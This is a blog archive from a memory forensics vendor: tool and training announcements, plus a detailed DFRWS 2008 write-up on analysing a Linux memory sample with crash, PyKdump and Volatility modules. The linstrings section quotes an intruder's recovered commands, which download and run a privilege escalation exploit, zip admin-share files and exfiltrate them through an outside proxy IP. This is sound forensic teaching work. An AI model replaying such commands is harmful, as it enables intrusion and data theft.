Thursday, October 16, 2008

Voltage: Giving Investigators the Power to Make a Difference!

Do you feel like your current methods of performing digital investigations are antiquated and unable to deal with the threats posed by the modern digital adversary? Do you feel that forensic vendors have lost touch with the needs of investigators? Do you believe that the ability to perform investigations should not be a privilege reserved for those who can afford a $100,000 price tag? Are you tired of forensics vendors who seem more interested in exploiting the community than in empowering investigators? We are in the midst of a "Digital Forensics Revolution"!



During our presentation at the SANS Forensics Summit, "Upping the 'Anti': Using Memory Analysis to Fight Malware", we made two major announcements that will dramatically affect the way digital investigations are performed across the enterprise. The first was the availability of a powerful new feature in F-Response 2.03: remote, real-time, read-only access to a computer system's physical memory. By coupling this revolutionary technology with their ability to provide remote access to a computer's physical disks, F-Response has provided digital investigators with a truly unique capability that will shape the future of digital investigations.


During the presentation, we also publicly unveiled Voltage. Voltage is a platform that combines the award-winning memory analysis capabilities of Volatility with the remote real-time access provided by F-Response. Imagine being able to reach across the network into the physical memory of a remote system and extract a sample of a suspicious executable in real time! While some investigators will prefer the command-line interface and cost effectiveness of Volatility (free!), Voltage provides an option for enterprise investigators who desire advanced automation and visualization. It also provides investigators with the ability to continuously monitor and verify the runtime state (integrity) of the systems within their organization. If an incident is detected, Voltage is able to automatically capture a sample of physical memory while the artifacts are still resident in memory and temporally relevant. It also provides the ability to search for Advanced Persistent Threats (APTs) that may be hiding within the enterprise. Voltage gives investigators unprecedented visibility into the once opaque components of the information infrastructure.

It's important to emphasize that Voltage provides a capability unlike anything you have ever seen. Unlike other enterprise solutions, which deploy heavyweight agents or servlets that attempt to naively perform live analysis on a compromised machine, the minimal F-Response target merely provides access to the raw data. At the same time, all of the complex processing and analysis is done remotely on a trusted machine. As a result, you have complete access to the runtime state of the remote system, physical memory and pagefile (swap), while minimizing your impact on potential artifacts and reducing your exposure to subversion. Whereas other solutions force you to collect a snapshot of physical memory, sometimes taking hours before analysis can even begin, Voltage allows the investigator to begin analyzing physical memory on a remote system in real time.

Thursday, October 9, 2008

Hoffmann Advanced Forensic Sessions

I'm very excited to announce a new training opportunity for those in Europe or those who like to travel to Europe. My colleagues at Hoffmann Investigations will be hosting advanced forensics training for experienced investigators. As part of this unique week-long training, I will be leading a 2-day session on Memory and Malware Forensics. This session is designed to combine informative lectures with hands-on training exercises and realistic scenarios, similar to those our investigators have faced in the field. This is your opportunity to learn how to leverage the power of Volatility 1.3 to improve your digital investigation process.

Training agenda:

  • Session 1 - Advanced Vista forensics: Lance Mueller

  • Session 2 - Apple and iPhone forensics: Remon Verkerk

  • Session 3 - Open source forensics, File Formats and Advanced File Carving: Joachim Metz and Robert-Jan Mora

  • Session 4 - Advanced Memory Forensics and Malware Analysis: AAron Walters

Please be sure to register early. The training is limited to 25 participants and I'm sure it will fill up quickly. For more details and information on how to register, please visit Hoffmann Investigations.

Sunday, September 7, 2008

Volatile University: Memory Forensics in the Classroom

Memory forensics is a critical component of the digital investigation process and an important skill for digital investigators. At Volatile Systems, we are committed to helping educate the community about memory analysis. In support of this commitment, we are currently working with a number of university, college, and continuing education programs to help integrate volatile memory analysis into their digital forensics course work and lab exercises. This is an exciting opportunity for us to work with future digital investigators and those investigators who have gone back to improve their skill set. If you are currently instructing a class on computer forensics and have an interest in exploring how other educators are integrating memory forensics into their curriculum, please let us know.

On a related note, this fall I will be co-teaching a graduate class, ENTS 689I Network Immunity, at the University of Maryland, College Park. This course will actually be composed of three short courses: Cryptography and Information Security, System Security, and Network Security. I am very excited to be teaching this class alongside Dr. Charles Clancy and Dr. Nick Petroni. I consider Charles and Nick to be two of the top systems security researchers. Charles has done some amazing work in the area of wireless networking and Nick pioneered much of the work being done in memory analysis and rootkit detection. Based on the topics which will be covered and the projects that are going to be assigned, this should be a very exciting class! Not to mention, the students will also have the opportunity to learn about memory forensics using Volatility!

Saturday, August 16, 2008

Open Memory Forensics Workshop (OMFW)

I want to take this opportunity and thank everybody who attended the first Open Memory Forensics Workshop (OMFW). In particular, I want to thank all those who volunteered their time and resources to make the workshop such a success, especially, Eoghan Casey, Brendan Dolan-Gavitt, Andreas Schuster, Dr. Michael Cohen, Jesse Kornblum, Dr. Brian Carrier, Matthew Geiger, Keith Jones, and Brian Dykstra. I have received nothing but positive feedback [link][link][link] which is directly attributable to the efforts of those who contributed.

Like many of you who follow this blog, I firmly believe that volatile memory analysis can dramatically augment the way we currently perform digital investigations and can help address many of the open challenges we currently face. I also know that the progress we have seen in memory forensics over the last few years has been driven by the work done in the open source community. Volatile Systems sponsored this workshop because our organization is committed to the belief that forensics and security should be accessible to everyone. The goal of this workshop is to create a forum that brings together the top researchers and practitioners in an environment that fosters the open exchange of ideas, so we can find ways to help each other. It is our goal to help make this community approachable, so others may be inspired to get involved and contribute back to the community.

If you are interested in learning more about this year's workshop, the agenda and slides have been posted on the OMFW website. As a side note, we have already started planning next year's event. Be sure to follow this blog and the workshop website for further updates! Due to the overwhelming response this year, we were not able to fulfill all the registration requests, so please be sure to register early!

Please feel free to post any comments, questions, or feedback you may have!

Friday, August 15, 2008

Volatility 1.3: Advanced Memory Forensics

The Volatility Team is pleased to announce the release of Volatility 1.3, the open source memory forensics framework. The framework was recently used to help win both the DFRWS 2008 Forensics Challenge and the Forensics Rodeo, demonstrating its power and effectiveness for augmenting digital investigations.

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for performing advanced memory forensics. The extraction techniques are performed completely independently of the system being investigated, yet still offer unprecedented visibility into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples, while providing a powerful platform for further research.

Volatility 1.3 currently supports the investigation of Microsoft Windows XP Service Pack 2 and Service Pack 3 memory samples. Preliminary support has also been added for the Linux operating system, making Volatility the only cross-platform memory analysis framework.

Some of the new features in Volatility 1.3 include:

  • Over 14 new data view modules!

  • New object model allowing easier module development and memory exploration

  • New plugin design allowing organizations to easily create, maintain, and share modules

  • New object oriented scanning infrastructure (Very Fast!)

  • Process graphing capabilities

  • Ability to extract open registry handles

  • Ability to dump a process' addressable memory

  • Ability to extract executables from memory samples

  • Transparently supports a variety of sample formats (e.g., CrashDump, Hibernate, DD)

  • Automated conversion between sample formats

  • New scanning modules (e.g., for kernel modules)

  • Support for XP SP3


Special thanks to Brendan Dolan-Gavitt, Andreas Schuster, Michael Cohen, and Matthieu Suiche.

Download the Volatility Framework from:

https://www.volatilesystems.com/default/volatility

Thanks,

The Volatility Team

Wednesday, August 13, 2008

PyFlag/Volatility Team Wins DFRWS Challenge!



I'm very excited to announce that the PyFlag/Volatility Team was chosen the winner of the 2008 Digital Forensic Research Workshop (DFRWS) Forensic Challenge. This year's challenge focused on developing advanced tools and techniques in the areas of memory forensics and data fusion.

I want to take this opportunity to thank Eoghan Casey, Matthew Geiger, and Wietse Venema for putting on a fantastic challenge. I also want to thank both Michael Cohen and David Collett for all their hard work and long hours. It was an honor to work with such a strong team. It's amazing to see how the PyFlag and Volatility teams have combined forces to dramatically push the state of the art in digital forensics research and analysis!

In case you missed it in previous posts, the final submission can be found here.

Tuesday, July 29, 2008

SANS WhatWorks Summit in Forensics and Incident Response

If you have time in October, you may want to attend the SANS WhatWorks Summit in Forensics and Incident Response. I'm scheduled to give an invited talk titled "Upping the 'Anti': Using Memory Analysis to Fight Malware". It is Vegas after all...

Digital Investigation Journal

I'm pleased to announce that I recently accepted an appointment to the Editorial Board of Digital Investigation: The International Journal of Digital Forensics & Incident Response. I consider Digital Investigation one of the top venues for publishing research in the area of memory forensics and I hope to help that trend continue. In fact, our initial paper "FATKit: A framework for the extraction and analysis of digital forensic data from volatile system memory" was originally published in Digital Investigation. I encourage people doing research in the area of memory analysis to submit their work for publication in Digital Investigation. You can be guaranteed to get one of my lengthy reviews!

Tuesday, July 15, 2008

Linux Memory Forensics

A collaboration with the PyFlag team, Michael Cohen and David Collett.

One of the major components of the DFRWS 2008 challenge was to improve the state of Linux memory forensics techniques and to develop tools that are applicable to a broad range of systems and forensic challenges that an investigator may face. In this section, we will discuss the efforts that we have made in order to address those objectives. Our goal was to make a variety of new tools and techniques available to investigators and demonstrate how they can be used to help investigate the memory sample provided as part of the challenge (challenge.mem). At the end of this section, we will also address how the information extracted from RAM can be leveraged in the second major component of the challenge, the fusion of memory, hard disk, and network data.

Previous research has demonstrated that memory forensics is often an important component of the digital investigation process [cite]. Memory forensics offers the investigator the ability to access the runtime state of the system and has a number of advantages over traditional live response techniques, typically used by forensic toolkits [cite]. While there has been some previous research into Linux memory forensics, the majority of the recent work has focused primarily on Windows memory analysis.

In 2004, Michael Ford demonstrated how an investigator could use many of the preexisting tools for crash dump collection and analysis to help perform analysis in the wake of an incident [cite]. In particular, he described how the "crash" utility can be used to investigate a crash dump collected from a compromised system. While "crash" proved a valuable tool for analyzing crash dumps, the author was forced to rely on "crude" techniques for analyzing memory samples that were not collected in a crash-supported format (i.e., a linear mapping of physical memory). Also in 2004, Mariusz Burdach described collecting a sample of physical memory from the /proc pseudo-filesystem and its kcore file [cite]. He began by performing basic analysis (grep, strings, and hex editors) to look for interesting strings, and he then discussed advanced analysis that could be performed by painstakingly using gdb to analyze the system call table and list running processes. In 2005, Sam Stover and Matt Dickerson used a string searching method to find malware strings in a memory sample collected from /proc/kcore on a Linux system [cite]. Later in 2005, Burdach extended this research by releasing the idetect tools for the 2.4 kernel, which aided in extracting file content from memory and listing user processes [cite]. In 2006, the FATKit project described a generic architecture for dealing effectively with the abstractions of memory forensics, allowing support for both Linux and Windows analysis, as demonstrated in its example modules [cite]. Also in 2006, Urrea described techniques for enumerating processes and manually rebuilding a file from memory [cite].

As we can see in each of these previous examples, debugging tools and their supporting information (i.e., symbols) have played an important part in Linux memory forensics. As a result, we felt it was important to leverage as much of the previous work and experience with Linux kernel debugging as possible. Thus our first contribution with respect to this challenge was to create a patch for the Red Hat crash utility, which is maintained by David Anderson. This is the same utility originally discussed by Ford, but we have modified it so that it can analyze a linear sampling of physical memory, as in the case of the challenge.mem sample distributed with the challenge.

Red Hat Crash Utility

The Red Hat Crash Utility combines the kernel awareness of the UNIX crash utility with the source code debugging abilities of gdb. It also has the ability to analyze over 14 different memory sample formats. Another advantage of crash is that it supports a number of different architectures (x86, x86_64, ia64, ppc64, s390, and s390x) and versions of Linux (from Red Hat 6.0 (Linux version 2.2.5-15) up to Red Hat Enterprise Linux 5 (Linux version 2.6.18+)). Thus it really does address the need for broad applicability. Our patch for crash can be found at the following URL:

http://www.4tphi.net/~awalters/dfrws2008/volcrash-4.0-6.3_patch

Once the patch has been applied (patch -p1 <volcrash-4.0-6.3_patch) and the source code built (make), you will also want to obtain the mapfile and namelist (a vmlinux kernel object file) for the DFRWS memory sample.

In order to process a linear sampling of memory, you will need to pass the --volatile command line option as seen in the following example:

./crash -f ../2.6.18-8.1.15.el5/System.map-2.6.18-8.1.15.el5 ../2.6.18-8.1.15.el5/vmlinux ../dfrws/response_data/challenge.mem --volatile

Crashing Challenge.mem

In this section, we will discuss how we can use the crash commands to help extract artifacts from the memory sample found in the challenge. Upon successful invocation, crash will present information about the system whose memory was sampled. For the image in the challenge, the output will look like this.

From this information, we can see that the sample was taken on Sun Dec 16 23:33:42 2007 and the machine had been running for 00:56:51. It also gives us a lot of other interesting information from the image, such as the amount of memory, the number of processors, etc. Our patch sets the current context to the Linux task with the PID of 0. As seen in the output, this is the PID for the "swapper" task. If necessary, this context can be changed using the "set" command. Information about available commands can be found through the "help" command. In the following sections we will demonstrate the type of information that can be extracted using crash. In particular, we will primarily focus on those things germane to the challenge.

Processes

Listing tasks is often one of the first things people want to do to see what is actually running on the system. By issuing this command, the investigator will receive information about process status similar to the Linux ps command:

crash> ps
output

From this output we can extract information about the processes that were active on the box when the sample was collected. The ps command also has a number of useful command line options. For example, the investigator may want to display a process's parental hierarchy to determine how it was invoked (-p). As seen in the following output, the -t option can also be used to display the run times, start times, and cumulative user and system times for the tasks. This information can be extremely useful as part of time line analysis and for determining the temporal relationships between events that occurred on the system.

crash> ps -t
output

Using the -a option we are able to discern the command line arguments and environment strings for each of the user-mode tasks. This may be particularly useful when encountering an unknown process in memory or determining how a suspicious executable was invoked. It can also be helpful for mapping a process and its associated UID back to a user when the /etc/passwd file is not available. For example, by leveraging the environment strings we can determine that the bash process (PID: 2585) was started by user stevev.

crash> ps -a
output

We are also able to extract the open files associated with the context of each task. Beyond presenting information associated with each of the open descriptors, it also prints the current root directory and working directory for each of those contexts. This can often provide valuable leads when dealing with the large volume of evidence associated with modern investigations.

crash> foreach files
output

We can also extract information about each task's open sockets. This can be useful for determining if there are any open connections with other systems that need to be investigated further. It will also show if the system is listening on any ports that may have been points of entry or backdoors left behind. In the case of the challenge memory sample, there aren't any open connections, but the dhclient process (PID: 1565) has a socket with source port 68 and the sendmail process (PID: 1872) has a socket with source port 25.

crash> foreach net
output

Using crash we can also extract a lot of other information related to the state of the system:

Mounted file systems
crash> mount
output
Open files per file system
crash> mount -f
output
Kernel message buffer
crash> log
output
Swap information
crash> swap
output
Machine information
crash> mach
output
Loaded Kernel Modules
crash> mod
output
chrdevs and blkdevs arrays
crash> dev
output
PCI device data
crash> dev -p
output
I/O port/memory usage
crash> dev -i
output
Kernel memory usage
crash> kmem -i
output
Kernel vm_stat table
crash> kmem -V
output

There are a couple of things to note from the previous output. First, from the swap information we can see that the load on the system is not causing pages to be swapped out. Second, by leveraging the data in the kernel message buffer we can get an indication of when the system was booted. For example, the audit(1197861235.541:1): initialized boot message carries a Unix timestamp corresponding to 2007-12-16 22:14:01.
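
As a quick aside, that conversion is easy to reproduce. The following hedged Python sketch applies the GMT-5 offset (reported by linident, discussed later) to the audit timestamp; audit timestamps are seconds since the Unix epoch:

from datetime import datetime, timedelta, timezone

# Timestamp taken from the audit boot message above; the fractional
# part is milliseconds. Applying the GMT-5 offset lands around
# 22:14 local time on 2007-12-16.
audit_ts = 1197861235.541
local = datetime.fromtimestamp(audit_ts, timezone(timedelta(hours=-5)))
print(local.isoformat())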

This was just a sample of the type of information that is available through the default command set that comes with crash. Another benefit of leveraging the Red Hat Crash Utility is that the command set can be extended by loading shared libraries. In the following section, we will discuss an extension module that allows us to use Python scripts to interface with crash.

PyKdump Framework (Python scripting for crash)

PyKdump, written by Alexandre Sidorenko, embeds a Python interpreter as a dynamically loadable 'crash' extension so you can create Python scripts to help perform analysis. In the following sections, we will show how PyKdump can help extract information from the challenge memory sample.

PyKdump includes a program called xportshow, which can be used to extract a lot of useful network-related information beyond what is available in crash's default command set, including important information from the challenge sample.

One of the first things we can do is extract detailed information about the system's available interfaces. This allows us to extract information similar to that provided by the Linux command "ifconfig". This is useful for capturing the state of those interfaces, including how long it has been since they transmitted or received packets and whether an interface is in promiscuous mode. From this we can also confirm that the IP address of the eth0 interface is 192.168.151.130, which can help as we analyze the pcap data.

crash> xportshow -iv
output

Using xportshow, we can also extract information from the internal ARP cache. This can be useful to determine other systems that may need to be investigated or to determine if the ARP cache has been manipulated in any way.

crash> xportshow --arp
output

We can also extract the internal routing table to determine if the routes have been manipulated in an attempt to redirect traffic.

crash> xportshow -r
output

While on the topic of layer 3 routing, we can also use xportshow to extract the route cache, also known on Linux as the forwarding information base (FIB). This stores recently used routing entries and is consulted before going to the routing table. Thus we can use this information to determine other machines the system was communicating with and look for signs of manipulation. For example, the route cache for the challenge image shows that our suspect system (192.168.151.130) previously communicated with the following addresses: 219.93.175.67, 86.64.162.35, 192.168.151.2, and 192.168.151.254. The 219.93.175.67 address corresponds to the address where the zip file was being exfiltrated.

crash> xportshow --rtcache
output

Continuing up the stack, we can also use xportshow to once again extract all the open sockets. As seen in the following results, xportshow presents this information in a format similar to netstat. This is extremely useful for determining both active network connections and listening services. It also provides a number of command line arguments for filtering the output.

crash> xportshow -a
output

PyKdump also provides a crashinfo program that can print the system's runtime parameters (sysctl), file locks, and stack summaries.

As you can see, our patch now allows us to leverage both the Red Hat Crash Utility and PyKdump to extract a lot of valuable information from the memory sample in the challenge. The goal of our further development efforts was to leverage the power of these tools while developing new tools and techniques that are applicable to an even broader range of systems and forensic challenges than just debugging Linux systems. The following sections will describe how we addressed those goals using Volatility, the open source volatile memory artifact extraction utility framework. We will also discuss how we are adding support to Volatility that will allow you to run your PyKdump commands transparently, even while working on a Windows host. By leveraging Volatility, our efforts at combining multiple data sources will not be limited to a particular operating system.

Volatility

Volatility is an open source modular framework written in Python for extracting digital artifacts from acquired samples of volatile system memory. From its inception it was designed to be a modular and extensible framework for analyzing samples of volatile memory taken from a variety of operating systems and hardware platforms. The Volatility Framework builds upon research we performed on both VolaTools and FATKit. While previous versions of the framework focused on the analysis of Windows XP SP2 samples, as part of this challenge we will demonstrate how easily it can be adapted to other operating systems as well (in this case, Linux). This challenge also allowed us to make use of the powerful new features added in Volatility 1.3.

The power of Volatility is derived from how it handles the abstractions of volatile memory analysis within its software architecture. This architecture is divided into three major components: Address Spaces, Objects and Profiles, and Data View Modules.

Address Spaces

Address spaces are intended to simulate random access to a linear set of data. Thus each address space must provide both a read function and a function to test whether a requested region is accessible. It is through the use of address spaces that Volatility is able to provide support for a variety of file formats and processor architectures. These address spaces are also designed to be stackable while maintaining the ability to have concurrent handles to the same data through different transformations. In order to analyze the challenge.mem sample, we make use of both the FileAddressSpace and the IA-32 paged virtual address space, IA32PagedMemory, which are also used for Windows memory analysis.
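
To make the address space contract concrete, here is a minimal sketch of the two spaces named above. The class names mirror the description, but the bodies are illustrative assumptions rather than the exact Volatility 1.3 implementation: the virtual space shows only the simplified non-PAE x86 walk with 4KB pages, and reads that cross a page boundary are not handled.

import os
import struct

class FileAddressSpace:
    # Linear (physical) address space backed by the sample file.
    def __init__(self, path):
        self.fhandle = open(path, "rb")
        self.size = os.path.getsize(path)

    def is_valid_address(self, addr):
        return 0 <= addr < self.size

    def read(self, addr, length):
        if not self.is_valid_address(addr):
            return None
        self.fhandle.seek(addr)
        return self.fhandle.read(length)

class IA32PagedMemory:
    # Virtual address space stacked on a base (physical) space; pgd is
    # the physical address of one process's page directory.
    def __init__(self, base, pgd):
        self.base, self.pgd = base, pgd

    def _entry(self, addr):
        data = self.base.read(addr, 4)
        return struct.unpack("<I", data)[0] if data and len(data) == 4 else None

    def vtop(self, vaddr):
        # Two-level walk: page directory, then page table. Large (4MB)
        # pages and PAE are omitted for brevity.
        pde = self._entry(self.pgd + ((vaddr >> 22) * 4))
        if pde is None or not pde & 1:      # present bit
            return None
        pte = self._entry((pde & 0xFFFFF000) + (((vaddr >> 12) & 0x3FF) * 4))
        if pte is None or not pte & 1:
            return None
        return (pte & 0xFFFFF000) | (vaddr & 0xFFF)

    def is_valid_address(self, vaddr):
        return self.vtop(vaddr) is not None

    def read(self, vaddr, length):
        # Assumes the read does not cross a page boundary.
        paddr = self.vtop(vaddr)
        return None if paddr is None else self.base.read(paddr, length)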

Objects and Profiles

Objects refer to any data found within an address space at a particular offset. The new object model included in 1.3, which was used in the software for this challenge, supports many of the semantics of the C programming language. Volatility uses profiles to define those object formats. When analyzing a Linux sample, the profile can be automatically generated from the source code or debugging information. For the challenge we will be using a profile generated for the 2.6.18-8.1.15.el5 kernel. We also include the System.map as a component of the profile.
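
As a rough illustration of what a generated profile contains, consider the hedged sketch below: essentially a mapping from structure name to its size and member offsets, paired with symbol addresses from the System.map. Every number shown is a placeholder, not the real 2.6.18-8.1.15.el5 layout.

# Hypothetical excerpt of a generated Linux profile:
# type name -> (size, {member: (offset, type description)}).
linux_types = {
    "task_struct": (1408, {
        "tasks": (0x78,  ["list_head"]),            # process list linkage
        "pid":   (0x1C4, ["int"]),
        "uid":   (0x1D4, ["int"]),
        "comm":  (0x2D4, ["array", 16, ["char"]]),  # command name
    }),
}

# Symbol addresses supplied by the matching System.map (placeholder value).
system_map = {"init_task": 0xC0370440}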

Data View Modules

Data view modules provide the algorithms that find where the data is located. These are the methods used to collect data or objects from the sample. For this challenge we created 11 new data view modules to facilitate analysis of Linux samples, each of which is described in the following sections. These new modules were built for the new pluggable architecture included in Volatility 1.3, which allows new modules to be added without requiring any changes to the framework's source code.
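
The sketch below illustrates the general shape of such a plugin: a single file dropped into the plugin directory registers itself when imported, so the framework discovers it without any source changes. The base class and the profile helpers it calls are illustrative stand-ins, not the verbatim 1.3 interface.

class Command:
    # Simplified plugin registry: any subclass registers itself at import
    # time, so a new module is just a file defining a class like this one.
    registry = {}

    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        Command.registry[cls.__name__] = cls

class linps_sketch(Command):
    """List tasks by walking the kernel task list (illustrative)."""
    def execute(self, profile, addr_space):
        init_task = profile.symbol("init_task")        # assumed helper
        for task in profile.walk_list(addr_space, init_task, "tasks"):
            print(task.pid, task.uid, task.comm)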

Strings

As mentioned previously, one of the most common forms of analysis performed on a sample of physical memory is to look for sequences of printable characters extracted using the "strings" command. Thus it is here that we will begin our discussion of analyzing memory using Volatility. One of the major limitations of relying on this method of analysis alone is that it is a context-free search: it simply treats the sample of memory as one big block of data. For example, while reviewing the strings from this image we are able to find strings related to bash command history resident in memory. From these commands we can see that someone on the system attempted to copy Excel spreadsheets and pcap files from an admin share (/mnt/hgfs/Admin_share) to a temporary file. At some other point they attempted to discover if a vulnerable version of the X Window System was running on the system. They then proceeded to download and execute a privilege escalation exploit from the Metasploit project intended to gain root privileges.

In an attempt to add more context to these types of strings, we created a module called linstrings, which provides functionality equivalent to Volatility's strings command. This allows us to map the strings extracted from the memory sample back to the corresponding virtual address and associated process. This mapping is accomplished by walking the address translation tables and determining which processes have the ability to access the physical page where the string is located. In the Linux version we only consider the user-land address space.
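
The following hedged sketch captures the idea: walk each task's page tables once to build a reverse map from physical page frame to (pid, virtual page), then resolve each hit from the strings output against that map. get_process_address_space() and get_available_pages() are stand-in names for the plugin's internals.

PAGE_SHIFT = 12

def build_reverse_map(tasks):
    # Maps a physical frame number to every (pid, virtual page) that can
    # address it; shared pages simply appear under several pids.
    reverse = {}
    for task in tasks:
        proc_as = task.get_process_address_space()   # assumed helper
        for vpage in proc_as.get_available_pages():  # user land only
            paddr = proc_as.vtop(vpage)
            if paddr is not None:
                reverse.setdefault(paddr >> PAGE_SHIFT, []).append(
                    (task.pid, vpage))
    return reverse

def resolve_string(reverse, physical_offset):
    # Maps a physical offset (e.g., from `strings -t d`) to [pid:vaddr].
    frame = physical_offset >> PAGE_SHIFT
    delta = physical_offset & ((1 << PAGE_SHIFT) - 1)
    return [(pid, vpage + delta) for pid, vpage in reverse.get(frame, [])]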

python volatility linstrings -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5 -S challenge.strings > dfrws_strings_map
output

Examples of interesting strings (physical offset, [pid:virtual address], string):

8393760    [2582:8fa1420]  http://219.93.175.67:80
10456534   [2585:8b59dd6]  tar -zpxvf xmodulepath.tgz
197604536  [2585:8b4e4b8]  wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
107837393  [2582:92087d1]  [stevev@goldfinger ~]$ cp /mnt/hgfs/software/xfer.pl .
207989168  [2585:8b4b9b0]  ./xfer.pl archive.zip
212984368  [2585:8b4c230]  zip archive.zip /mnt/hgfs/Admin_share/acct_prem.xls /mnt/hgfs/Admin_share/domain.xls /mnt/hgfs/Admin_share/ftp.pcap
222017064  [2582:922f628]  [stevev@goldfinger ~]$ rm xfer.pl
10456593   [2585:8b59e11]  ./root.sh
197607328  [2585:8b4efa0]  export http_proxy="http://219.93.175.67:80"

The ability to map these strings back to their respective processes is extremely useful. We can see that all the strings in the previous table were addressable by processes with a UID of 501, which is the UID for user stevev, Steve Vogon.

Examples of interesting files found in memory:

  • /etc/passwd [link]

  • /etc/group [link]


linident/lindatetime

The linident module is used to provide valuable information about the system from which the memory sample was acquired. This module provides information similar to the crash sys command, but it has been augmented to include timezone information, which we have found useful during temporal reconstruction. As seen in the following output, the local timezone for the system was GMT-5. It also provides the GMTDATE corresponding to when the sample was acquired. The current time and timezone information can also be obtained from the lindatetime module.

python volatility linident -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5.map
output

linps

We also provide a module that will extract the processes that were running on the system when the sample was acquired. We have augmented this to include the UID of the process owner. By combining this with the strings-to-process mapping provided by linstrings, we are able to attribute those strings to a particular user. For example, by correlating with the environment information previously discussed (or with /etc/passwd, if available), we know that any process with UID 501 can be attributed to user stevev, and that any strings mapping to those processes are related to that user as well.

python volatility linps -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linpsscan

We have also included linpsscan, which makes use of the Volatility scanning framework. Unlike linps, which traverses the operating system data structures to find the processes that were running on the system, this module performs a linear scan of the physical memory sample, searching for task_struct objects, which it treats as constrained data items. These constraints were automatically developed by sampling valid task_structs from the memory sample. The benefit of this technique can be seen in the fact that the previous module, linps, was only able to enumerate 89 tasks, while linpsscan found 10 more within the physical address space. We have also included the UID so each task_struct can be mapped back to a user.
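
The hedged sketch below conveys the flavor of such a scan. The member offsets are placeholders, and the simple sanity checks stand in for the constraints the real module derives by sampling known-good task_structs from the image:

import struct

PID_OFF, UID_OFF, COMM_OFF = 0x1C4, 0x1D4, 0x2D4   # placeholder offsets
SCAN_STRIDE = 4

def scan_task_structs(mem):
    # mem: the raw physical memory sample as bytes.
    for off in range(0, len(mem) - 0x300, SCAN_STRIDE):
        pid = struct.unpack_from("<i", mem, off + PID_OFF)[0]
        uid = struct.unpack_from("<i", mem, off + UID_OFF)[0]
        comm = mem[off + COMM_OFF:off + COMM_OFF + 16].split(b"\x00")[0]
        # Constrained data item: plausible pid/uid plus a printable name.
        if 0 <= pid < 32768 and 0 <= uid < 65536 \
                and comm and all(0x20 <= c < 0x7F for c in comm):
            yield off, pid, uid, comm.decode("ascii")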

python volatility linpsscan -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linmemdmp

We also created a module called linmemdmp. This module automatically rebuilds the address space for a specified process and dumps its entire addressable memory to a file for further analysis. This can be extremely useful if you are attempting to brute force encryption keys (e.g., SSL) or you want to add some context to your string searches. The process to be dumped can be specified by either a PID (-P) or a task_struct physical memory offset (-o), depending on whether it was discovered with linps or linpsscan, respectively.
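
Conceptually, the module amounts to the hedged sketch below, reusing the stand-in helpers from the linstrings sketch above:

PAGE_SIZE = 0x1000

def dump_addressable_memory(task, out_path):
    # Rebuild the process address space and write out every page that is
    # resident in the sample; swapped-out pages are simply skipped.
    proc_as = task.get_process_address_space()   # assumed helper
    with open(out_path, "wb") as out:
        for vpage in sorted(proc_as.get_available_pages()):
            data = proc_as.read(vpage, PAGE_SIZE)
            if data:
                out.write(data)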

python volatility linmemdmp -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5 -P 3048

linpktscan

We also created a linpktscan module that performs a linear scan of the physical memory sample looking for memory resident network packets. This module makes use of the Volatility generic scanning framework to describe network packets as constrained data items. The current implementation constrains the sought-after data to UDP or TCP packets with a header of minimum length and a valid IP header checksum. Another nice feature of this module is that it also allows the investigator to extract those packets from memory and write them to a pcap file that can then be imported into their favorite packet analysis tool (e.g., Wireshark).
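
The checksum constraint is simple to state in code. Below is a minimal sketch of the validity test (the standard RFC 791 checksum: the one's-complement sum of the header's 16-bit words, checksum field included, must fold to 0xFFFF); the surrounding scanning logic is omitted:

import struct

def ip_header_checksum_ok(header):
    # header: candidate IPv4 header bytes (IHL * 4 bytes long).
    if len(header) < 20 or len(header) % 2:
        return False
    total = sum(struct.unpack(">%dH" % (len(header) // 2), header))
    while total >> 16:                          # end-around carry
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF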

python volatility linpktscan -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

Using this module on the memory sample provided in the challenge, we were able to see that the system had recently communicated with the following IP addresses over HTTP: 219.93.175.67 and 198.105.193.114. Of particular interest are the packets being sent to the 219.93.175.67 address. This was the address where the zip file was exfiltrated using HTTP cookies. By using linpktscan we are able to find and extract memory resident packets with cookies containing parts of the exfiltrated data. Thus we are able to connect the data in the pcap files back to the system.

On another interesting note, we are also able to extract FTP packets flowing between 10.2.0.2 and 10.2.0.1. These memory resident packets were part of the ftp.pcap file that was exfiltrated. Thus we know that at some point this file was loaded into memory on the system.

linvm

This module will display the virtual memory mappings for each process. This provides information analogous to that typically found in the maps file of the process's /proc entry. It can be extremely useful for determining which files may be memory-mapped by a process and where they can be found within memory, and thus for understanding how the address space is being used. We have also augmented the output to include information about the code, data, and stack regions of a process's virtual address space in case an investigator wants to extract them from memory as well.

python volatility linvm -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linsockets

We have also included a module, linsockets, which can be used to extract information about each task's open sockets. As previously mentioned, this can be useful for determining if there are any open connections with other systems or if the system is listening on any unexpected ports and, if so, which process is responsible.

python volatility linsockets -f challenge.mem -p profiles/2_6_18-8_1_15_el5/centos-2.6.18-8.1.15.el5.types.py -s profiles/2_6_18-8_1_15_el5/System.map-2.6.18-8.1.15.el5
output

linfiles

We are also able to extract the open files associated with the context of each task. As previously mentioned, this can often provide valuable leads to target files or directories of interest when dealing with large disk images.

